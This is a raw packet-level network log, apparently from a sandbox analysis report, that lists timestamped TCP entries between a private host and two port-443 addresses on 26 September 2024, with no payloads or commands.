Sep 26, 2024 17:55:27.676032066 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.676095009 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.676100969 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.676119089 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.676130056 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.676193953 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.676203012 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.676387072 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.676400900 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.676423073 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.676429033 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.676429033 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.676438093 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.676486969 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.676749945 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.677098989 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.677160025 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.677241087 CEST	49736	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.680310011 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.680489063 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.680533886 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.680546999 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.680552006 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.680588007 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.680653095 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.683242083 CEST	443	49737	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.683476925 CEST	49737	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.683499098 CEST	443	49737	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.684494019 CEST	443	49737	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.684578896 CEST	49737	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.684945107 CEST	49737	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.685004950 CEST	443	49737	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.685431004 CEST	49749	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.685461998 CEST	443	49749	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.685502052 CEST	49737	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.685509920 CEST	443	49737	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.685538054 CEST	49749	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.685765028 CEST	49749	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.685770988 CEST	443	49749	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:27.686292887 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.686336040 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.686347008 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.686357021 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.686399937 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.686418056 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.686672926 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.686719894 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.686726093 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.694791079 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.694833040 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.694853067 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.694865942 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.694914103 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.694920063 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.695101976 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.695142031 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.695178986 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.695184946 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.695229053 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.695261955 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.695338011 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.695388079 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.695393085 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.695593119 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.695641041 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.695647001 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.701847076 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.701894045 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.701906919 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.701919079 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.701965094 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.701976061 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.702050924 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.702095985 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.702101946 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.714231014 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.714313030 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.714319944 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.714364052 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.714416027 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.714421034 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.714561939 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.714606047 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.714612007 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.717026949 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.717070103 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.717111111 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.717117071 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.717173100 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.717204094 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.717274904 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.717317104 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.717323065 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.723401070 CEST	443	49736	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.729387999 CEST	49737	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:27.730618954 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.730680943 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.730686903 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.730849981 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.730894089 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.730900049 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.730907917 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.730950117 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.730954885 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.731278896 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.731329918 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.731333017 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.731342077 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.731381893 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.731390953 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.731688976 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.731738091 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.731744051 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.739258051 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.739322901 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.739355087 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.739362001 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.739404917 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.739409924 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.739538908 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.739588022 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.739593029 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.739770889 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.739816904 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.739821911 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.740053892 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.740091085 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.740111113 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.740115881 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.740156889 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.740163088 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.740202904 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.740250111 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.740256071 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.740462065 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.740523100 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.740528107 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.740725040 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.740782022 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.740789890 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.743669987 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.743738890 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.743758917 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.743839979 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.743880033 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.743884087 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.743891954 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.743931055 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.744106054 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.748595953 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.748660088 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.748681068 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.748723030 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.748764038 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.748769045 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.756762028 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.756820917 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.756864071 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.756896973 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.756917953 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.756938934 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.757004023 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.757045984 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.757046938 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.757061005 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.757107019 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.757112980 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.781224012 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.781279087 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.781299114 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.781321049 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.781364918 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.781371117 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.785836935 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.785882950 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.785903931 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.785911083 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.785976887 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.785989046 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.786201954 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.786253929 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.786259890 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.792187929 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.792244911 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.792247057 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.792259932 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.792300940 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.792390108 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.792454004 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.792485952 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.792491913 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.792499065 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.792540073 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.800275087 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.800337076 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.800393105 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.800409079 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.800455093 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.800502062 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.800508976 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.801094055 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.801165104 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.801177979 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.801182985 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.801227093 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.801232100 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.801414967 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.801454067 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.801465034 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.801470041 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.801513910 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.808574915 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.808721066 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.808775902 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.808782101 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.808897018 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.808933973 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.808943033 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.808947086 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.808991909 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.813895941 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.814116955 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.814168930 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.814172029 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.814182043 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.814224005 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.814229012 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.814477921 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.814516068 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.814537048 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.814542055 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.814584017 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.814713001 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.814781904 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.814836979 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.814841986 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.828350067 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.828397036 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.828421116 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.828427076 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.828474045 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.828496933 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.828558922 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.828600883 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.828604937 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.828917980 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.828954935 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.828975916 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.828980923 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.829024076 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.829186916 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.829255104 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.829299927 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.829305887 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.831851006 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.831908941 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.831914902 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.832005978 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.832053900 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.832058907 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.832392931 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.832431078 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.832448959 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.832453966 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.832498074 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.832526922 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.832783937 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.832828999 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.832834005 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.832916021 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.832961082 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.832966089 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.833152056 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.833192110 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.833204031 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.833209038 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.833264112 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.833451033 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.833558083 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.833600044 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.833605051 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.847357988 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.847425938 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.847449064 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.847495079 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.847546101 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.847553015 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.847704887 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.847750902 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.847755909 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.858783007 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.858866930 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.858890057 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.858954906 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.858998060 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.859004974 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.859018087 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.859066010 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.859071016 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.859327078 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.859374046 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.859378099 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.859394073 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.859436989 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.859601021 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.859678030 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.859719992 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.859724998 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.872123003 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.872217894 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.872221947 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.872242928 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.872288942 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.872294903 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.876955986 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.877010107 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.877027988 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.877044916 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.877090931 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.877090931 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.877104998 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.877171040 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.877222061 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.883270025 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.883336067 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.883346081 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.883368969 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.883418083 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.883424997 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.883610964 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.883660078 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.883677959 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.883687019 CEST	443	49727	142.250.186.132	192.168.2.16
